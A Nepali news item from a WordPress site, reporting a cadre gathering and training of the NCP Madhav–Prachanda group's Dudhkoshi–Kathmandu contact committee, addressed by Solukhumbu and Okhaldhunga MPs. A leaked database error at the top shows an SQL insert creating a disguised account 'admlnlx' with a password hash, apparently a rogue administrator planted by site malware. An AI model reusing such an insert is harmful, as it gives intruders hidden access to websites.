WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHavPT0X1N34b5OiN/StItJXXvaTrY0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:07:35', '', 'admlnlx', 'admlnlx')
काडमाण्डौं । नेपाल कम्युनिष्ट पार्टि (नेकपा) माधब–प्रचण्ड समूहको माप्य दुधकोशी–काठमाण्डौं सम्पर्क समितिको अगुवा कार्यकता भेला तथा प्रशिक्षण कार्यक्रम सम्पन्न भएको छ ।
मंगलबार काठमाण्डौको एभरेष्ट रेष्टुरेन्टमा सम्पन्न अगुवा कार्यकर्ता भेला तथा प्रशिक्षण कार्यक्रममा माप्य दुधकोशी गाउँपालिकाबाट काठमाण्डौं आई बसोबास गर्ने नेकपा माधव–प्रचण्डमा आस्था राख्ने ब्याक्तिहरुको बाक्लो उपस्तिथि रहेको थियो ।
कार्यक्रममा सोलुखुम्बुका संघिय संसद तथा नेकपा सोलु जिल्ला इन्चार्ज हेम कुमार राई “सुरबीर”, ओखलढुङ्गाका संघिय संसद तथा नेकपा ओेखलढुङ्गा जिल्ला इन्चार्ज यज्ञ सुनुवार, नेपपा सोलुखुम्बु जिल्ला सचिव गोम्बु शेर्पा “कर्जाङ” जिल्ला सचिवालय सदस्य डिल्लि राई, जिल्ला सदस्य गणेश कुमार राई, रमेश राई, प्रकाश खालिङ र दिल कुमार राईले सम्बोधन गर्नुभएको थियो ।